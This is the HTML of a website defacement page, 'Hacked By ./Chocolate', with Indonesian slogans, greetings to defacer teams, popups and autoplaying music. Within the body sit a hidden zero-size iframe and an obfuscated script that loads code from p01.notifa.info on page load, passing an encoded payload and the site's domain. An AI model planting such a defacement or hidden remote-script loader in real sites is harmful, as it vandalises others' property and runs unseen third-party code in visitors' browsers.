<html>
 <head> 
 	<script>
 	alert("Hello Admin ");
 </script>
 <script>
 	alert("Im Chocolate ");
</script>
<script>var nama; nama=prompt('What is your name?'); if(nama){ alert('Apa kabar '+nama+'! Saya Chocolate:), Senang berkenalan Dengan anda'); }else{ alert('Selamat Datang Dan Jangan Lupa Berdoa.'); } </script>

<!doctype html>



<html lang="en">



  <head>



    <title>Hacked By ./Chocolate</title>



    <meta name="theme-color" content="black" />  



    <meta charset="utf-8">



    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no">



    <meta property="og:title" content="Hacked By ./Chocolate">



    <meta property="og:description" content="Chocolate Was Here"> 



    <meta name="viewport" content="width=device-width, initial-scale=1.0">



    <meta property="og:image" content="https://h.top4top.io/p_18336cb7h0.jpeg"> 



    <link rel="SHORTCUT ICON" href="https://h.top4top.io/p_18336cb7h0.jpeg">



    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css" integrity="sha384-PsH8R72JQ3SOdhVi3uxftmaW6Vc51MKb0q5P2rRUpPvrszuE4W1povHYgTpBfshb" crossorigin="anonymous"> 



    <link href="https://fonts.googleapis.com/css?family=Bahiana|Black+Ops+One|Josefin+Slab |New+Rocker|Quicksand|Wallpoet|orbitron" rel="stylesheet">



    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css"> 



<style>



 body {



    background-color:black;



    text-align:center;



	color: #fff;



	font-family:New Rocker;



    position: center;



    width: 800px;



	font-size: 18px;



    margin: 0 auto;



    }



 .nick{



       animation: blink 5s infinite;



       font-family:Quicksand;



       font-size:18px;



  }



  @keyframes blink{



         to{opacity: .0;}



   }



h2 {



 font-family:New Rocker;



 color: #fff;



 }



 button {



    color: #fff;



    background: transparent linear-gradient(to right, #27c4f5, #a307ba, #fd8d32, #70c050, #27c4f5);



	background-size: 500% 500%;



	-webkit-animation: Gradient 15s ease infinite;



	-moz-animation: Gradient 15s ease infinite;



	animation: Gradient 15s ease infinite;



}







@-webkit-keyframes Gradient {



	0% {



		background-position: 0% 50%



	}



	50% {



		background-position: 100% 50%



	}



	100% {



		background-position: 0% 50%



	}



}







@-moz-keyframes Gradient {



	0% {



		background-position: 0% 50%



	}



	50% {



		background-position: 100% 50%



	}



	100% {



		background-position: 0% 50%



	}



}



@keyframes Gradient {



	0% {



		background-position: 0% 50%



	}



	50% {



		background-position: 100% 50%



	}



	100% {



		background-position: 0% 50%



	}



}



 



</style>



  </head>



  <body>



    <script src="https://cdn.rawgit.com/FicriPebriyana/efek/0a935a6c/efek%20salju.js" type="text/javascript"></script>



<body>

<iframe width="0" height="0" scrolling="no" frameborder="no" allow="autoplay" src="https://h.top4top.io/p_18336cb7h0.jpeg" ></iframe><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncX0AGAZ9l0NcarmYe9no1%2b3YJ4YvIpG56keu%2bg5bpahbAtUPj6O1Z9X3QL1tm0AyZ8xbbZXKyKfTd602G0u3hvctBhTsahRyDxKknjNZUFUM1bHPvN96ZRzX%2fKbZkjn5HX6WKy92m0lQoa0pvvxLMImPsp%2fabC9lWzOkLF2NhUu%2bzP%2bDZjMHDUtkP4vQC22Nz0TTSJkMvFmdGgEDQSDb09Gcd%2fOWC0pyaWIl8al2x8BhmxOyUazsOYOw%2bdjfY%2bmbR55yn10G1ly%2bDODLYyia5HqaQxaXiPu6%2bGqdT9G41r2LrbU4jKsyDvSAGrZ6C%2fTrcen8ZpG8%2bAyJAF6dr2WvRFUX6EAo3anQunBQ%2bgPU5Rpq8vTqjp5q%2b1UjW%2fCdnhJRFIsiiqzceT7NjauW%2fgBDWkpNlGbcDE91%2f%2bBwE%2bkS8Sci5Lyp%2bMA7vybep%2bFG0mJtVtEqx6z%2b9woitfkaSzrSGhN6TfUs2nydvBRQNAirq9Be8rfXpLTC7zfU7t%2fRikWdekmtsmG2CTe0b6vTYIQ0QsAC7s5ORzvbACKusYdH07QyHloG0J31U611kMMO84go%2bAfEIJEy4t7pbJ0mapCsJf5rNV8B60y6mr" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>







<center>
<img src="https://i.top4top.io/p_1833dklot0.gif" height="400" width="400"> 
</center>



      </div><br />





 <h4> <font color="red"> ♤ <font color="white"> Hacked By ./Chocolate <font color="red">  ♤</h4>

 <br>

 	<br>

 <h4><font color="white">Kami melakukan hal-hal yang kami lakukan untuk rakyat, bukan untuk kepentingan kita sendiri seperti sebuah ketenaran
 
 <br>
 
   <br>
 
<h4><br><br><font color="white">Thanks To :

<br>

<font color="white"> ./K1pan <font color="red"> ~ <font color="white"> ./Cheese <font color="red"> ~ <font color="white"> ./Vanilla <font color="red"> <br> ~ <font color="white"> ./Mr.Rakha <font color="red"> ~ <font color="white"> Bgsuf <font color="red">  ~ <font color="white"> H4ckGaming <font color="red"> ~ <font color="white"> Kakegurai <font color="red"> ~ <font color="white"> ./FadilXploit <font color="red"> ~ <font color="white"> Ferdark <font color="red"> ~ <font color="white"> And All My Friend <br>

<br>

<h4><br><br><font color="white">Official Team :

<br>

<font color="white"> Shadow Cyber Team <font color="red"> ~ <font color="white"> 666 Cyber Team <font color="red"> ~ <font color="white"> SWATFIGTHER-XPLOIT <font color="red"> <br> ~ <font color="white"> Ghost Skull Security <font color="red"> ~ <font color="white"> Defacer Newbie Tersakiti <br>

<br>

<center><audio autoplay="autoplay" controls="controls" src="https://d.top4top.io/m_1833uzf7f0.mp3" type="audio/mpeg"></audio></center>

  <br>

<br>

	<h4><font color="white"> Copyright © ./Chocolate </font></h4>

  </body>



  <br></html>
